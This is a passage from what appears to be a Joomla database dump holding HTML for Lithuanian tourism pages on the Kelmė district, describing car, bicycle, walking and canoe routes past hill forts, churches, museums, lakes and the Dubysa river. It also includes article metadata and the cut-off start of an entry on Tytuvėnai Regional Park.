nuostabiu erdvės ir vaizdingo kraštovaizdžio deriniu. </em></p>\r\n<p><strong>Pagryžuvio dvaras – </strong><em>architektūrinę, istorinę, kraštovaizdinę vertę turintis Pagryžuvio dvaro kompleksas, kuriam priklauso rūmai, du tvartai, du tarnų namai, virtuvė-skalbykla, svirnas, parkas, įtrauktas į Nekilnojamųjų kultūros vertybių registrą.</em></p>\r\n<p><strong>Kelionės metu nuvažiuojama apie 80 km.</strong></p>\r\n<p><strong>Kelionės trukmė apie 6 val.</strong></p>\r\n<p><strong>Siūlome keliauti automobiliu.</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong><span style=\"font-size: 19px;\">Archeologijos pėdsakais...</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/marsrutai/archeologijos_pedsakais/{/gallery}</td>\r\n<td>\r\n<p><span><strong>Tytuvėnai:</strong> <strong>Bridvaišio piliakalnis. </strong><em>Bridvaišio piliakalnis datuojamas I tūkst. Tai 10 m aukščio kalnas ant Bridvaišio ežero kranto. Jis įrengtas žemaičių genčių žemėse, šiauriniame Bridvaišio ežero krante esančioje kalvoje - buvusioje ežero saloje. </em></span></p>\r\n<p><span><em>Legendos pasakoja, kad šiame piliakalnyje dar XIII a. stovėjusi pilis, tačiau archeologai nei įtvirtinimų, nei kultūrinio sluoksnio su radiniais čia neaptiko. </em></span></p>\r\n<p><span><em>Padavimai mena, kad piliakalnyje esą mūro rūsiai ir juose paslėptas lobis, kad nuo pakrantės į ežero salą veda kūlgrinda. Kiti porina, kad slaptais požemio takais piliakalnis susisiekia su bažnyčios požemiais. </em></span></p>\r\n<p><span><strong>Tytuvėnų apylinkės:</strong> <strong>Kubilių piliakalnis, </strong><em>vadinamas Birutės kalnu, iš vakarų juosiamas Dubysos slėnio, iš pietų </em>– <em>Gryžuvos upės, iš šiaurės </em>–<em> griovos, kuria teka Molkasio upelis, yra didžiausias rajone.</em></span></p>\r\n<p><span><strong>Kukečiai:</strong> <strong>Burbaičių piliakalnis </strong><em>plačiai žinomas savo padavimais ir legendomis. Pasak vienos iš jų,</em> <em>senovėje jį supylęs milžinas, čia prasmego kadais stovėjusi</em><em> bažnyčia.</em></span></p>\r\n<p><span><strong>Pakražantis: Papilių piliakalnis – </strong></span>dažniausiai pasitaikančios rajone nupjauto kūgio formos piliakalnis; piliakalnyje stovėjo nuo 1253 m. minimos Kražių žemės Kražių pilis, kurios piliavietė paminėta 1394 m.</p>\r\n<p><span><strong>Bumbulių gynybiniai įtvirtinimai, </strong><em>vadinami Daugvierės kalnu.</em> </span></p>\r\n<p><span><strong>Kriaučiaus akmuo </strong>–<em>tai geologinis paminklas, paskutiniojo ledynmečio reliktas, trečias pagal dydį akmuo Lietuvoje.</em></span></p>\r\n<p><span><strong>Kražiai: Medžiokalnis </strong>–<em>senovėje čia buvo alkakalnis,</em> <em>augo šventas</em> <em>ąžuolas, iš po kurio šaknų tryško šventas vanduo, netoli jo kūrenosi šventoji ugnis ir stovėjo deivės Medeinės statula.</em></span></p>\r\n<p><span><em>Į Medžiokalnį veda akmeniniai laiptai, grįsti Vytauto Didžiojo laikais</em>.</span></p>\r\n<p><span><strong>Kelionės metu nuvažiuojama apie 90 km.</strong></span></p>\r\n<p><span><strong>Kelionės trukmė apie 8 val.</strong></span></p>\r\n<p><span><strong>Siūlome keliauti automobiliu.</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong><span style=\"font-size: 19px;\">Piligrimų keliais...</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/marsrutai/piligrimu_keliais/{/gallery}</td>\r\n<td><strong>Tytuvėnai.</strong> <strong>Švč. Mergelės Marijos bažnyčios ir bernardinų vienuolyno ansamblis</strong> <em style=\"color: #3d3d3d;\">garsus arkadomis, uždarais kiemais, senoviniais pastatais,</em><em style=\"color: #3d3d3d;\"> originalus 17–18 a. meno paminklas ne tik Lietuvoje, bet ir Šiaurės rytų Europos meno kontekste.</em><br />\r\n<p><strong>Lioliai. </strong><strong>Šv. apaštalų Simono ir Judo Tado bažnyčios kompleksas</strong> – <em>bažnyčia pastatyta 1768 m., vertinga kaip Lietuvos medinio baroko paminklas.</em></p>\r\n<p><strong>Kelmė.</strong> <strong>Švč. Mergelės Marijos Ėmimo dangun bažnyčia – </strong><em>XX a. pradžios neogotikos stiliaus statinys, nors pirmoji bažnyčia pastatyta dar Lietuvos didžiojo kunigaikščio Vytauto rūpesčiu 1416 m.;</em> <strong> Evangelikų reformatų bažnyčia, </strong><em>pastatyta 1615 m. žemaičių seniūno Jurgio Gruževskio lėšomis, yra vienas gražiausių Lietuvoje išlikusių mišraus gotikos ir renesanso stiliaus pastatų.</em></p>\r\n<p><strong>Palendriai.</strong> <strong>Palendrių Aušros Vartų Švč. Mergelės Marijos vieša oratorija </strong><em>yra monolitinė vienbokštė bažnyčia, pašventinta 1938 m., prie šoninių durų sunykusiame antkapyje iškaltas čia palaidoto jos statytojo, kun. Kazimiero Ambrozaičio vardas ir gyvenimo metai (1859–1947)</em>; <strong>Šv. Benedikto vienuolynas – </strong><em>jametarp iškilių kalvų, Vainagių girios pakraštyje, įsikūrę prancūzų vienuoliai iš Solesmės; paklydusios sielos vienuolių prieglobstyje gali surasti atgaivą.</em></p>\r\n<p><strong>Šaukėna</strong>i. <strong>Švč. Trejybės bažnyčia – </strong><em>varpinė ir tvora su įspūdingais barokiniais šventoriaus vartais – Šaukėnų sakralinis kompleksas, bažnyčia minima jau buvusi XV a.</em></p>\r\n<p><strong>Užventis.</strong> <strong>Šv. Marijos Magdalenos bažnyčia, </strong><em>suburianti pasisemti ramybės, spėjama, pastatyta XVI a. pab.–XVII a. pr. miestelį valdant Matui Vainai.</em></p>\r\n<p><strong>Vaiguva. </strong><strong>Šv. Jono Krikštytojo bažnyčia, </strong><em>pasatyta 1719 m., įdomi liaudies architektūros formomis, medine varpine ir koplytstulpiu.</em></p>\r\n<p><strong>Kražiai.</strong> <strong>Švč. Mergelės Marijos Nekaltojo Prasidėjimo bažnyčia – </strong>mūrinė dvibokštė vėlyvojo baroko stiliaus vienuolėms benediktinėms statyta bažnyčia dominuoja miestelio panoramoje; ji mena Kražių skerdynių įvykius; Kolegija – tai vienas svarbiausių švietimo ir jėzuitų mokslo centrų Lietuvoje, veikęs 1614–1844 m., dabar čia įsikūręs M. K. Sarbievijaus kultūros centras.</p>\r\n<p><strong>Kelionės metu nuvažiuojama apie 130 km.</strong></p>\r\n<p><strong>Kelionės trukmė apie 8 val.</strong></p>\r\n<p><strong>Siūlome keliauti automobiliu.</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong><span style=\"font-size: 19px;\">Kelmės kraštas per vieną dieną</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/marsrutai/per_diena/{/gallery}</td>\r\n<td>\r\n<p><strong>Tytuvėnai</strong>. <strong>Švč. Mergelės Marijos bažnyčios ir bernardinų vienuolyno ansamblis</strong> <em>garsus arkadomis, uždarais kiemais, senoviniais pastatais,</em><em> originalus 17–18 a. meno paminklas ne tik Lietuvoje, bet ir Šiaurės rytų Europos meno kontekste; <strong>Kristaus Gelbėtojo koplyčia-mauzoliejus</strong></em>, <strong>Bridvaišio piliakalnis</strong><em> įrengtas žemaičių genčių žemėse, šiauriniame Bridvaišio ežero krante esančioje kalvoje, buvusioje ežero saloje</em>; <strong>apžvalgos bokštas </strong><em>suteikia</em><em>puikią galimybę</em> <em>nuo Kokmaniškės kalno pasigėrėti apylinkių vaizdais, stebėti paukščius</em><strong>; Giliaus pažintinis takas</strong> –<em> puikus poilsis pėsčiomis</em> <em>ir galimybė pasigėrėti vaizdinga ežero, pasak legendos, senovėje atūžusio oru ir užkritusio ant čia augusio miško, gamta; </em><strong>Miško muziejus –</strong> <em>čia eksponuojami paukščių inkilai, medžio drožiniai, paukščių lizdai, miško žvėrių ir paukščių iškamšos.</em></p>\r\n<p><strong>Lioliai. Šv. apaštalų Simono ir Judo Tado bažnyčios kompleksas –</strong><em> bažnyčia pastatyta 1768 m., vertinga kaip Lietuvos medinio baroko paminklas<strong>.</strong></em></p>\r\n<p><strong>Kelmė. Kelmės dvaro sodyba –</strong> <em>vienas iš seniausių ir įdomiausių dvarų ansamblių Žemaitijoje ir vienas iš nedaugelio išlikusių barokinio stiliaus dvarų Lietuvoje.</em></p>\r\n<p><strong>Kražiai. Švč. Mergelės Marijos Nekaltojo Prasidėjimo bažnyčia –</strong><em> mūrinė dvibokštė vėlyvojo baroko stiliaus</em> <em>vienuolėms benediktinėms statyta bažnyčia dominuoja miestelio panoramoje; ji mena Kražių skerdynių įvykius</em><strong>; </strong></p>\r\n<p><strong>Kolegija –</strong><em> </em>tai vienas svarbiausių švietimo ir jėzuitų mokslo centrų Lietuvoje, veikė 1614–1844 m., dabar čia įsikūręs M. K. Sarbievijaus kultūros centras.</p>\r\n<p><strong>Užventis. Dvaro sodyba – </strong><em>su dvaru susiję Šatrijos Raganos, Švedijos karaliaus Karolio XII, Nepriklausomybės Akto signataro J. Smilgevičiaus vardai;</em><strong> Malūnas </strong><em>dar mena čia gyvenusią ir kūrusią rašytoją Šatrijos Raganą</em>; <em>dabar čia įsikūrusiame sveikatingumo komplekse galima maloniai praleisti laiką;</em><strong> Kraštotyros ir P. Višinskio muziejai – </strong><em>kraštotyros muziejus</em> <em>įsikūręs restauruotame senojo Užvenčio dvaro svirne, šiame dvare jaunystėje dešimt metų gyveno rašytoja</em> <em>Šatrijos Ragana; P. Višinskio</em> <em>gimtajame name įrengta memorialinė ekspozicija, kurioje atsispindi ir kaimynystėje gyvenusios rašytojos Žemaitės gyvenimo ir kūrybos kelias<strong>. </strong></em></p>\r\n<p><strong>Kelionės metu nuvažiuojama apie 90 km.</strong></p>\r\n<p><strong>Kelionės trukmė apie 8 val.</strong></p>\r\n<p><strong>Siūlome keliauti automobiliu.</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong><span style=\"font-size: 19px;\">Kūrėjų takais...</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/marsrutai/kureju_keliais/{/gallery}</td>\r\n<td>\r\n<p><strong>P. Višinskio memorialinė sodyba-muziejus Ušnėnuose, Užvenčio seniūnijoje</strong></p>\r\n<p><em>Povilo Višinskio (1875–1906) gimtajame name 1960 m. atidarytas muziejus, įrengta memorialinė ekspozicija; joje atsispindi ir kaimynystėje gyvenusios rašytojos Žemaitės (1845–1921) gyvenimo ir kūrybos kelias.</em></p>\r\n<p><strong>Užvenčio kraštotyros muziejus</strong></p>\r\n<p><em>Įkurtas 1965 m., o nuo 1973 m. jo ekspozicija perkelta į restauruotą Užvenčio dvaro svirną. Dvare 1887–1898 m. gyveno rašytoja Marija Pečkauskaitė-Šatrijos Ragana. Vėliau dvaras priklausė Lietuvos Nepriklausomybės akto signatarui Jonui Smilgevičiui (1870–1942). Muziejuje parengtos ekspozicijos ir pasakoja apie šiuos žymius žmones, taip pat pateikiama medžiaga apie Užvenčio miestelio istoriją.</em></p>\r\n<p><strong>Kražių M. K. Sarbievijaus kultūros centras</strong></p>\r\n<p><em>1614–1844 m. Kražiuose veikė jėzuitų kolegija,</em><em>viena svarbiausių švietimo įstaigų Lietuvoje. Čia yra gyvenę ir dirbę garsūs rašytojai ir poetai: Mykolas Kazimieras Sarbievijus, Dionizas Poška, Mykolas Daukša, vyskupas Motiejus Valančius, Simonas Stanevičius, Jonas ir Antanas Juškos ir daug kitų. Vieninteliam išlikusiam bursos, buvusio bendrabučio, pastate įkurtas M. K. Sarbievijaus kultūros centras.</em></p>\r\n<p><strong>Žalpių kraštotyros muziejus</strong></p>\r\n<p><em>Įkurtas 2006 m., jo ekspozicijos skirtos pirmajam Homero „Odisėjos“ ir „Iliados“ vertėjui Jeronimui Raliui (1876–1921), vargonų meistrui bei pirmojo Lietuvoje sklandytuvo kūrėjui Jonui Garalevičiui (1871–1943) ir Lietuvos Steigiamojo Seimo nariui, visuomenės veikėjui Kazimierui Raliui (1885–1958).</em></p>\r\n<p><strong>Paminklas Broniui Laucevičiui -Vargšui Kelmėje</strong></p>\r\n<p><em>Draugystės parko prieigose, prie išlikusio seno malūno pastato ir Kražantės upės užtvankos, stovi šviesaus atminimo liaudies skulptoriaus Juozo Liaudanskio iškaltas paminklas dramaturgui, prozininkui Broniui Laucevičiui-Vargšui. Kelmę puošia ir daugiau šio autoriaus skulptūrų. Jo garbei Kelmėje rengiami akmentašių simpoziumai – </em><em>akmeninės skulptūros, kurioms menininkai įkvėpė gyvybę, lyg perlai išbarstyti po miesto gatves.</em></p>\r\n<p><strong>Palendrių Aušros Vartų Švč. Mergelės Marijos vieša oratorija</strong></p>\r\n<p><em>Tai monolitinė vienbokštė apleista bažnyčia, pašventinta 1938 m., joje jau nebesimeldžiama. Ją pastatė kunigas Kazimieras Ambrozaitis</em>. <em>Prie šoninių bažnyčios durų sunykusiame antkapyje iškaltas čia palaidoto jos statytojo vardas, gyvenimo metai (1858–1947) ir žodžiai: „Išvyko Amerikon neturtingas būdamas, ten pradirbęs 30 metų grįžo Lietuvon ir pasistatė sau paminklą bažnyčią“.</em></p>\r\n<p><strong>Šaukėnų kraštotyros muziejus</strong></p>\r\n<p><em>Įkurtas 1999 m. Ekspozicija supažindina su miestelio istorija bei čia gyvenusiais įžymiais žmonėmis. Eksponuojami dailininkės V. Zalensienės dailės darbai, įdomūs liaudies buities eksponatai bei tautodailė, parengta ūkininko trobos ekspozicija, nuolat rengiamos parodos.</em></p>\r\n<p><strong>Kelionės metu nuvažiuojama apie 140 km.</strong></p>\r\n<p><strong>Kelionės trukmė apie 8 val.</strong></p>\r\n<p><strong>Siūlome keliauti automobiliu.</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong><span style=\"font-size: 19px;\">Dviračiais aplink Tytuvėnus</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/marsrutai/dviraciais_aplink/{/gallery}</td>\r\n<td>\r\n<p><em>Tai 13,5 km ilgio žiedinis maršrutas, jungiantis įdomiausius Tytuvėnų krašto kultūros ir gamtos objektus bei gražiausius kraštovaizdžius. </em><em>Maršruto trukmė - apie 4 val. Pradžia nuo Miško gatvės. Trasą sudaro du žiedai, juosiantys Bridvaišio ir Giliaus ežerus. Juos jungia 2 km atkarpa, einanti per Tytuvėnų miestą.</em></p>\r\n<p><em>Trasos ilgis aplink Giliaus ežerą – 5 km, o aplink Bridvaišio ežerą – 6,5 km. Dviračių trasos atkarpa, juosianti Giliaus ežerą, vingiuoja miško takais, buvusio geležinkeliuko pylimu pakyla iki vietos, kur galima apžvelgti Giliaus ir Apušio ežerus, ir nusileidžia žaliavandenio Giliaus ežero pakrante iki Miško muziejaus. </em><em>Vėliau trasa ne vieną šimtmetį skaičiuojančiu pušynu suka Tytuvėnų miesto link. Tytuvėnų mieste dviračių trasa vingiuoja miesto gatvėmis. Čia pasitinka Kristaus gelbėtojo koplyčia – mauzoliejus.</em></p>\r\n<p><em>Ilgesniam laikui sustabdys įspūdingas bažnyčios ir vienuolyno ansamblis bei pagoniškas alkakalnis, šiandien vadinamas Šv. Jurgio kalneliu. </em><em>Antras trasos žiedas driekiasi aplink vaizdingą Bridvaišio ežerą. Šone lieka nedidelis Varlinio ežeriukas.</em></p>\r\n<p><em>Trasa trumpam atitrūksta nuo ežero ir nuvingiuoja į Kokmaniškės (Majako) kalną, kur nuo 15 m aukščio apžvalgos bokšto atsiveria įspūdingas apylinkių kraštovaizdis. </em></p>\r\n<p><em>Tuomet dviračių trasa grįžta atgal prie ežero, kur stūkso šimtmečius skaičiuojantis Bridvaišio (Skogalio) piliakalnis. Nuo jo viršūnės galima pasigrožėti giliausiu ir gražiausiu parko ežeru – Bridvaišiu. </em></p>\r\n<p><em>Šiame dviračių trasos žiede ilgesniam poilsiui apsistoti galima Bridvaišio ežero stovyklavietėje bei Sedulos poilsiavietėje.</em></p>\r\n<p><strong>Kelionės metu nuvažiuojama apie 14 km.</strong></p>\r\n<p><strong>Kelionės trukmė apie 3 val.</strong></p>\r\n<p><strong>Siūlome keliauti dviračiais arba pėsčiomis.</strong></p>\r\n<p><strong><strong><strong><em>Dviračių nuoma: www.kelme.lt - Turizmas - Aktyvus poilsis</em></strong></strong></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong><span style=\"font-size: 19px;\">Giliaus ežero pažintinis takas</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/marsrutai/giliaus_takais/{/gallery}</td>\r\n<td>\r\n<p><em style=\"color: #3d3d3d;\">Gilius - vienas iš keturių didesnių Tytuvėnų miestą supančių ežerų, išsiskiriantis savo ypatinga spalva ir didele augalijos bei gyvūnijos įvairove. Ežero plotas 36 ha, o giliausia vieta siekia net 23,10 metrų. </em></p>\r\n<p><em style=\"color: #3d3d3d;\">Legenda byloja, kad ežeras atūžęs viesulu ir užkritęs ant čia augusio miško...</em></p>\r\n<p><em>Smaragdinę žalsvą spalvą vandeniui suteikia ežerą maitinantys šaltiniai, kurių vanduo prisotintas iš žemių gelmių atneštais ištirpusiais karbonatais. </em><em>Žalią vandens atspalvį paryškina ežero aplinkos atspindys vandenyje bei gelmėse esantys žalieji dumbliai.</em></p>\r\n<p><em>Ežeras susiformavo prieš 10-14 tūkst. metų, tirpstant ledynams. Dabartinėje ežero vietoje slūgsojo masyvus ledo luitas, kuris laikui bėgant buvo užneštas žemėmis ir galutinai ištirpo tik visiškai atšilus klimatui. Ištirpęs ledyno vanduo ir pasiliko ledo suformuotoje dauboje. </em><em>Su Giliaus ežero gamtos turtais susipažinsite keliaudami 3,3 km ilgio pažintiniu taku, kuris veda nuolat besikeičiančia ežero pakrante.</em></p>\r\n<p><em>Kelionės trukmė - apie 2 val. </em></p>\r\n<p><em>Trumpam poilsiui pakvies jaukiai įrengti Giliaus ežero pliažai ir atokvėpio vietos. </em><em>Keliaujant pažintiniu taku, plačiau susipažinti su ežero gyvūnijos ir augalijos įvairove padės įrengti informaciniai stendai.</em></p>\r\n<p><strong>Giliaus ežero pažintinio tako ilgis apie 3,3 km.</strong></p>\r\n<p><strong>Kelionės trukmė apie 2 val.</strong></p>\r\n<p><strong>Siūlome keliauti dviračiais arba pėsčiomis.</strong></p>\r\n<p><strong><strong><em>Dviračių nuoma: www.kelme.lt - Turizmas - Aktyvus poilsis</em></strong></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong><span style=\"font-size: 19px;\">Vandens turizmas Dubysos upe</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/marsrutai/dubysos_upe/{/gallery}</td>\r\n<td>\r\n<p><em>Dubysa – viena gražiausių Lietuvos upių bei populiariausių vandens turizmo trasų. Dubysos upė Dubysos regioninio parko teritorijoje vingiuoja 65 km. </em></p>\r\n<p><em>Dubysos vandens turizmo trasa (ilgis – 35 km) įrengta 2010 m., Raseinių rajono savivaldybės administracijai kartu su partneriais – Kelmės r. sav. administracija ir Dubysos regioninio parko direkcija vykdant projektą ,,Dubysos gamtinių išteklių panaudojimas turizmo plėtrai Raseinių ir Kelmės rajonuose“. </em></p>\r\n<p><em>Vaizdingas stačiašlaitis Dubysos senslėnis, pakrantėse rymantys piliakalniai, natūralios salpinės pievos, šlaitais srūvančių intakų gurgenimas, apsistoti tinkamos stovyklavietės ir kaimo turizmo sodybos sukuria poilsiui tinkamą atmosferą. </em></p>\r\n<p><em>Dubysos slėnis yra vienas iš raiškingiausių ir vaizdingiausių upės erozinio slėnio pavyzdžių Lietuvoje. Vidutinio sraunumo, duburiuota upė tinka bičiulių žygiams ir šeimyniniam turizmui. </em></p>\r\n<p><em>Maršruto pradžioje ir pabaigoje įrengtos stovyklavietės su pavėsinėmis, laužavietėmis ir kt. infrastruktūra. Trasoje pastatytos informacinės rodyklės. </em></p>\r\n<p><em>Trasoje esančiose stovyklavietėse ir poilsiavietėse patogu pradėti ar baigti kelionę upe: lėkšti Dubysos krantai, geras privažiavimas, yra automobilių stovėjimo aikštelės. Vandens turistams stovyklavietes nurodo specialūs ženklai. </em></p>\r\n<p><em>Maršruto pradžia: Maironių kaimas, Liolių seniūnija, Kelmės r. <span>LKS koordinatės 441643, 6162194 WGS koordinatės 55.591109, 23.074233 </span></em></p>\r\n<p><em><span>Maršruto pabaiga: Padubysio kaimas, Raseinių r. <span>LKS koordinatės 452181, 6140901 WGS koordinatės 55.400974, 23.245054 </span></span></em></p>\r\n<p><em><span><span>Maršrutą galima keisti pagal keliaujančių asmenų pageidavimus. </span></span></em><em>Galima sustoti ir išlipti poilsiavietėse, lankytinuose objektuose.</em></p>\r\n<p><strong><em>Baidarių ir katamaranų nuoma: www.kelme.lt - Turizmas - Aktyvus poilsis</em></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<p><strong><span style=\"font-size: 19px;\">Juodlės ežero pažintinis takas</span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/marsrutai/juodles_takai/{/gallery}</td>\r\n<td><em><span>Tai 4,5 km ilgio pažintinis ekologinis takas aplink Juodlės ežerą. Jame pažymėta 12 stotelių. Keliaujant iš vienos į kitą susipažįstama su kraštovaizdžiu, parkui būdingais miškais, kertinėmis miško buveinėmis, pelkėmis, retų rūšių augalais, grybais bei gyvūnais. Prie tako įrengti informaciniai stendai, apžvalgos bokšteliai.</span></em>\r\n<p><em><span>Juodlės ežerą paliko prieš 10 tūkst. metų maždaug tarp Šaukėnų ir Užvenčio tyvuliavusios ištirpusio ledyno marios. Vėliau jų vanduo prasigraužė pro Vainagių-Raudsparnės kalvagūbrį ir nutekėjo Ventos-Dubysos senslėniu. </span></em></p>\r\n<p><em><span>Dugne liko lyguma su nedideliais upeliais ir ežerėliais. Tuomet vyravo arktinis klimatas, tad rytinėje marių pakrantėje susidarė šaltoji dykuma. Nepastovios krypties vėjai supūtė kopas, kurių kauburėliai klimatui šylant apaugo mišku.</span></em></p>\r\n<p><em><span>Per tūkstančius metų Juodlės duburyje telkšojęs ežeras paseno, dugne nusėdo milijardai žuvusių mikroskopinių organizmų. Jų kūnai ir mineralinės medžiagos sudarė 1,5 - 5 metrų storio nuosėdų sluoksnį. Iš suirusių stambesnių augalų liekanų susiformavo iki trijų metrų storio durpių sluoksnis, ežero pakraščiai apžėlė vandens augalais.</span></em></p>\r\n<p><em><span>Prieš pusšimtį metų Juodlė buvo beveik užakusi, iš ežero telikusi maždaug pusės hektaro vandens „akis“ su sala. Vandens lopinėlį supo užpelkėjusi pieva. 1965 m. šaukėniškiai supylė pylimą ir užtvenkė iš ežero ištekantį upelį. Vanduo ežere pakilo apie metrą. Tačiau kastuvais ir karučiais supilta užtvanka nebuvo patikima. 1969 m. ežero pylimas buvo paaukštintas ir sutvirtintas. Iškasto grunto krūvos ežero vandeniui pakilus tapo salomis. Šiuo metu ežere yra 8 nedidelės salelės, apžėlusios vešlia žoline augalija ir beržais. Vasarą, įšilus vandeniui, į paviršių iškyla durpių salos, kurios vėliau vėl nugrimzta į dugną.</span></em></p>\r\n<p><em><span>Juodlės ežerą gaivina neišdžiūstantis ir neužšąlantis šaltiniuotas upelis. Pietinėje dalyje į ežerą įsilieja dar keli trumpesni iš šaltinių ištrykštantys upeliūkščiai. Ežeras gana žuvingas - žiemą po ledu galima pagauti lydekų, pavasarį ir vasarą kimba lynai, kuojos, raudės. </span></em></p>\r\n<p><em><span>Pagal paukščių įvairovę Juodlė yra pats turtingiausias Kurtuvėnų regioninio parko ežeras. Perėjimo ir veisimosi metu čia galima stebėti apie 30 paukščių rūšių. 1967 m. Juodlės ežeras paskelbtas vandens paukščių draustiniu.</span></em></p>\r\n<p><em><span>Juodlės kalnas - paskutinė pažintinio tako stotelė. Nuo jo atsiveria išraiškingas kraštovaizdis: mišku apaugusios kalvos, nendrėmis užželiantis ežeras, pakrantės nameliai. Prie Juodlės galima poilsiauti - maudytis, žvejoti. </span></em></p>\r\n<p><em><span><strong>Juodlės ežero pažintinio tako ilgis apie 4,5 km.</strong></span></em></p>\r\n<p><em><span><strong>Kelionės trukmė apie 2 val.</strong></span></em></p>\r\n<p><em><span><strong>Siūlome keliauti dviračiais arba pėsčiomis.</strong></span></em></p>\r\n<p><em><span><strong><strong>Dviračių nuoma: www.kelme.lt - Turizmas - Aktyvus poilsis</strong></strong></span></em></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong><span style=\"font-size: 19px;\">Vainagių pažintinis takas</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/marsrutai/vainagiu_takas/{/gallery}</td>\r\n<td>\r\n<p><em>Visa 4,3 km ilgio trasa, dar nėra galutinai įrengta, tačiau per sudėtingiausią jos dalį - pelkę - jau nutiestas medinis takas. </em><em>Keliaujant juo galima pasigrožėti Vainagių draustinio kraštovaizdžiu, Vainagių piliakalniu.</em></p>\r\n<p><em>Prie tako pastatytas apžvalgos bokštelis, iš kurio matoma bebrų gyvenvietė ir jų suręsta užtvanka. </em><em>Takas prie Vainagių ežero skirtas pristatyti kertines miško buveines bei mišką</em></p>\r\n<p><em><span><strong>Vainagių pažintinio tako ilgis apie 4,3 km.</strong></span></em></p>\r\n<p><em><span><strong>Kelionės trukmė apie 2 val.</strong></span></em></p>\r\n<p><em><span><strong>Siūlome keliauti dviračiais arba pėsčiomis.</strong></span></em></p>\r\n<p><em><span><strong>Dviračių nuoma: www.kelme.lt - Turizmas - Aktyvus poilsis</strong></span></em></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,52,'2014-06-04 19:05:26',135,'','2018-06-12 12:13:51',135,0,'0000-00-00 00:00:00','2014-06-04 19:05:26','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',17,0,6,'','',1,11923,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(200,287,'Tytuvėnų regioninis parkas','tytuvenu-regioninis-parkas','','<table class=\"renderedtable\" style=\"width: 100%;\" border=\"0\" cellspacing=\"2\" cellpadding=\"2\" align=\"left\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">\r\n<p>{gallery cols=7 orientation=vertical width=200}stories/trp/{/gallery} </p>\r\n<p> </p>\r\n</td>\r\n<td valign=\"top\">\r\n<p style=\"text-align: left;\"><strong>Apie parką</strong></p>\r\n<p style=\"text-align: left;\">Tytuvėnų regioninis parkas įkurtas 1992 m. siekiant išsaugoti kalvotą, pelkėtą, 